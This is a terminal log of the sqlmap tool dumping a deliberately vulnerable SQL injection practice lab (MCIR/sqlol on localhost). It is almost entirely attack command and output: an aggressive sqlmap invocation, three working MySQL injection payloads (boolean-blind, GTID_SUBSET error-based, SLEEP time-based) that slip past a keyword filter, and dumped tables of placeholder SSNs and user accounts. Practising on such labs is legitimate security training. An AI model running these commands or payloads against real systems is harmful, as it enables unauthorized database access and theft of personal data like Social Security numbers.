=================================================================================
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=low&sanitization_type=keyword&sanitization_params=union%2Cselect%2Cwhere%2Cand%2Cor%2C--%2C%23&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --dump --risk=3 --level=5

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 630 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: sanitization_level=low&sanitization_type=keyword&sanitization_params=union,select,where,and,or,--,#&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' OR NOT 4013=4013 AND 'XqQb'='XqQb&location=where_string&submit=Inject!

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=low&sanitization_type=keyword&sanitization_params=union,select,where,and,or,--,#&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' AND GTID_SUBSET(CONCAT(0x7162717071,(SELECT (ELT(5912=5912,1))),0x7170767171),5912) AND 'gbCA'='gbCA&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=low&sanitization_type=keyword&sanitization_params=union,select,where,and,or,--,#&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' AND (SELECT 3927 FROM (SELECT(SLEEP(5)))lRJo) AND 'sJZC'='sJZC&location=where_string&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
Database: sqlol
Table: ssn
[5 entries]
+-------------+-----------------------+
| ssn         | name                  |
+-------------+-----------------------+
| 000-00-1112 | Wengdack Slobdegoob   |
| 012-34-5678 | Herp Derper           |
| 111-22-3333 | Peter Weiner          |
| 666-67-6776 | Chunk MacRunfast      |
| 999-99-9999 | SlapdeBack LovedeFace |
+-------------+-----------------------+

Database: sqlol
Table: users
[5 entries]
+----+---------+-----------------------+
| id | isadmin | username              |
+----+---------+-----------------------+
| 1  | 1       | Herp Derper           |
| 2  | 1       | SlapdeBack LovedeFace |
| 3  | 0       | Wengdack Slobdegoob   |
| 4  | 0       | Chunk MacRunfast      |
| 5  | 0       | Peter Weiner          |
+----+---------+-----------------------+

